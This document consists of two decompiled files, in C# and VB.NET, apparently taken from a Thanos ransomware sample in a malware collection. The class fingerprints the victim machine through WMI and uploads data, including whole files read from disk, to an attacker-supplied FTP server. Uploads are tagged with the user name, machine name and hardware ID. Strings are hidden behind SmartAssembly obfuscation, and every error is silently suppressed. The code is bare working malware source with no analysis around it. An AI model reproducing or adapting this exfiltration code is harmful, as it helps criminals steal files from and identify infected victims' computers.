File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2/frgoWklvEOSV/GyWbmViNanxKl.cs
using System;
using System.IO;
using System.Management;
using System.Net;
using System.Text;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;

namespace frgoWklvEOSV;

internal sealed class GyWbmViNanxKl
{
	[NonSerialized]
	internal static GetString _0092;

	public static string nFyAFAYBITHjh()
	{
		//IL_0015: Unknown result type (might be due to invalid IL or missing references)
		//IL_001b: Expected O, but got Unknown
		//IL_0033: Unknown result type (might be due to invalid IL or missing references)
		//IL_0039: Expected O, but got Unknown
		//IL_00ad: Unknown result type (might be due to invalid IL or missing references)
		//IL_00b4: Expected O, but got Unknown
		string text = string.Empty;
		try
		{
			ManagementClass val = new ManagementClass(_0092(107403227));
			ManagementObjectCollection instances = val.GetInstances();
			ManagementObjectEnumerator enumerator = instances.GetEnumerator();
			try
			{
				if (enumerator.MoveNext())
				{
					ManagementObject val2 = (ManagementObject)enumerator.get_Current();
					text = ((ManagementBaseObject)val2).get_Properties().get_Item(_0092(107403238)).get_Value()
						.ToString();
				}
			}
			finally
			{
				((IDisposable)enumerator)?.Dispose();
			}
			string text2 = _0092(107403189);
			ManagementObject val3 = new ManagementObject(_0092(107403216) + text2 + _0092(107403175));
			val3.Get();
			return ((ManagementBaseObject)val3).get_Item(_0092(107403170)).ToString();
		}
		catch (Exception)
		{
			return string.IsNullOrEmpty(text) ? _0092(107388731) : text;
		}
	}

	public static void ATmjNWylGeJO(string GGfZJTIeZfqSyf = "URL", string EmtIKAFvwf = "USERNAME", string BxrieFCDHWF = "ACCESO", string EfhtMYGgxswewP = "")
	{
		try
		{
			string text = nFyAFAYBITHjh();
			FtpWebRequest ftpWebRequest = (FtpWebRequest)WebRequest.Create(GGfZJTIeZfqSyf + _0092(107404365) + Environment.UserName + _0092(107404320) + Environment.MachineName + _0092(107404331) + text + _0092(107404326));
			ftpWebRequest.Method = _0092(107402633);
			ftpWebRequest.Credentials = new NetworkCredential(EmtIKAFvwf, BxrieFCDHWF);
			ASCIIEncoding aSCIIEncoding = new ASCIIEncoding();
			byte[] bytes = aSCIIEncoding.GetBytes(EfhtMYGgxswewP);
			ftpWebRequest.ContentLength = bytes.Length;
			using Stream stream = ftpWebRequest.GetRequestStream();
			stream.Write(bytes, 0, bytes.Length);
		}
		catch
		{
		}
	}

	public static void DGdOiIgzOMW(string EsxiMLIAfaIHpW = "URL", string AwAIdzsyQmcXX = "USERNAME", string nvCXoOTWldXjB = "ACCESO", string jHSdWWdzYFXSmJ = "")
	{
		try
		{
			string text = nFyAFAYBITHjh();
			FtpWebRequest ftpWebRequest = (FtpWebRequest)WebRequest.Create(EsxiMLIAfaIHpW + _0092(107404365) + Environment.UserName + _0092(107404320) + Environment.MachineName + _0092(107404331) + text + _0092(107404331) + Path.GetFileName(jHSdWWdzYFXSmJ));
			ftpWebRequest.Method = _0092(107402633);
			ftpWebRequest.Credentials = new NetworkCredential(AwAIdzsyQmcXX, nvCXoOTWldXjB);
			byte[] array = File.ReadAllBytes(jHSdWWdzYFXSmJ);
			ftpWebRequest.ContentLength = array.Length;
			using Stream stream = ftpWebRequest.GetRequestStream();
			stream.Write(array, 0, array.Length);
		}
		catch
		{
		}
	}

	static GyWbmViNanxKl()
	{
		Strings.CreateGetStringDelegate(typeof(GyWbmViNanxKl));
	}
}

File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131/chaddad/frgoWklvEOSV/GyWbmViNanxKl.vb
Imports System
Imports System.IO
Imports System.Management
Imports System.Net
Imports System.Text
Imports SmartAssembly.Delegates
Imports SmartAssembly.HouseOfCards

Namespace frgoWklvEOSV
	' Token: 0x02000013 RID: 19
	Friend NotInheritable Class GyWbmViNanxKl
		' Token: 0x06000060 RID: 96 RVA: 0x0000C6C4 File Offset: 0x0000A8C4
		Public Shared Function nFyAFAYBITHjh() As String
			Dim text As String = String.Empty
			Dim text4 As String
			Try
				Dim managementClass As ManagementClass = New ManagementClass(GyWbmViNanxKl.getString_0(107403227))
				Dim instances As ManagementObjectCollection = managementClass.GetInstances()
				Using enumerator As ManagementObjectCollection.ManagementObjectEnumerator = instances.GetEnumerator()
					If enumerator.MoveNext() Then
						Dim managementObject As ManagementObject = CType(enumerator.Current, ManagementObject)
						text = managementObject.Properties(GyWbmViNanxKl.getString_0(107403238)).Value.ToString()
					End If
				End Using
				Dim text2 As String = GyWbmViNanxKl.getString_0(107403189)
				Dim managementObject2 As ManagementObject = New ManagementObject(GyWbmViNanxKl.getString_0(107403216) + text2 + GyWbmViNanxKl.getString_0(107403175))
				managementObject2.[Get]()
				Dim text3 As String = managementObject2(GyWbmViNanxKl.getString_0(107403170)).ToString()
				text4 = text3
			Catch ex As Exception
				text4 = If(String.IsNullOrEmpty(text), GyWbmViNanxKl.getString_0(107388731), text)
			End Try
			Return text4
		End Function

		' Token: 0x06000061 RID: 97 RVA: 0x0000C7E8 File Offset: 0x0000A9E8
		Public Shared Sub ATmjNWylGeJO(Optional GGfZJTIeZfqSyf As String = "URL", Optional EmtIKAFvwf As String = "USERNAME", Optional BxrieFCDHWF As String = "ACCESO", Optional EfhtMYGgxswewP As String = "")
			Try
				Dim text As String = GyWbmViNanxKl.nFyAFAYBITHjh()
				Dim ftpWebRequest As FtpWebRequest = CType(WebRequest.Create(String.Concat(New String() { GGfZJTIeZfqSyf, GyWbmViNanxKl.getString_0(107404365), Environment.UserName, GyWbmViNanxKl.getString_0(107404320), Environment.MachineName, GyWbmViNanxKl.getString_0(107404331), text, GyWbmViNanxKl.getString_0(107404326) })), FtpWebRequest)
				ftpWebRequest.Method = GyWbmViNanxKl.getString_0(107402633)
				ftpWebRequest.Credentials = New NetworkCredential(EmtIKAFvwf, BxrieFCDHWF)
				Dim asciiencoding As ASCIIEncoding = New ASCIIEncoding()
				Dim bytes As Byte() = asciiencoding.GetBytes(EfhtMYGgxswewP)
				ftpWebRequest.ContentLength = CLng(bytes.Length)
				Using requestStream As Stream = ftpWebRequest.GetRequestStream()
					requestStream.Write(bytes, 0, bytes.Length)
				End Using
			Catch
			End Try
		End Sub

		' Token: 0x06000062 RID: 98 RVA: 0x0000C8FC File Offset: 0x0000AAFC
		Public Shared Sub DGdOiIgzOMW(Optional EsxiMLIAfaIHpW As String = "URL", Optional AwAIdzsyQmcXX As String = "USERNAME", Optional nvCXoOTWldXjB As String = "ACCESO", Optional jHSdWWdzYFXSmJ As String = "")
			Try
				Dim text As String = GyWbmViNanxKl.nFyAFAYBITHjh()
				Dim ftpWebRequest As FtpWebRequest = CType(WebRequest.Create(String.Concat(New String() { EsxiMLIAfaIHpW, GyWbmViNanxKl.getString_0(107404365), Environment.UserName, GyWbmViNanxKl.getString_0(107404320), Environment.MachineName, GyWbmViNanxKl.getString_0(107404331), text, GyWbmViNanxKl.getString_0(107404331), Path.GetFileName(jHSdWWdzYFXSmJ) })), FtpWebRequest)
				ftpWebRequest.Method = GyWbmViNanxKl.getString_0(107402633)
				ftpWebRequest.Credentials = New NetworkCredential(AwAIdzsyQmcXX, nvCXoOTWldXjB)
				Dim array As Byte() = File.ReadAllBytes(jHSdWWdzYFXSmJ)
				ftpWebRequest.ContentLength = CLng(array.Length)
				Using requestStream As Stream = ftpWebRequest.GetRequestStream()
					requestStream.Write(array, 0, array.Length)
				End Using
			Catch
			End Try
		End Sub

		' Token: 0x06000064 RID: 100 RVA: 0x000028E6 File Offset: 0x00000AE6
		Shared Sub New()
			Strings.CreateGetStringDelegate(GetType(GyWbmViNanxKl))
		End Sub

		' Token: 0x04000091 RID: 145
		<NonSerialized()>
		Friend Shared getString_0 As GetString
	End Class
End Namespace
